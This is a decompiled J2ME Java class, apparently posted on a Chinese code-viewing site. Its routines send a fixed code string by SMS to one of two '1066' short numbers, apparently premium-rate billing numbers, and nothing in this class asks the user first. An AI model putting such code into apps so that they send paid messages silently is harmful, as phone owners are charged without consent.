?? i.java
字號:
// Decompiled by Jad v1.5.8e2. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://kpdus.tripod.com/jad.html
// Decompiler options: packimports(3) fieldsfirst ansi space
import javax.microedition.io.Connector;
import javax.wireless.messaging.*;
public class i
{
public static int a = 0;
public i()
{
}
public static boolean a()
{
if (a(a))
{
a++;
if (a > 1)
a = 0;
return true;
}
if (a((a + 1) % 2))
{
a++;
if (a > 1)
a = 0;
return true;
} else
{
return false;
}
}
public static boolean a(int j)
{
String s = "1AKJ0929D0929S S0500108";
boolean flag;
try
{
String s1;
if (j == 0)
s1 = "sms://10661250262";
else
s1 = "sms://10661250265";
MessageConnection messageconnection = null;
TextMessage textmessage;
(textmessage = (TextMessage)(messageconnection = (MessageConnection)Connector.open(s1)).newMessage("text")).setAddress(s1);
textmessage.setPayloadText(s);
messageconnection.send(textmessage);
flag = true;
}
catch (Exception exception)
{
flag = false;
}
return flag;
}
}
?? 快捷鍵說明
復(fù)制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -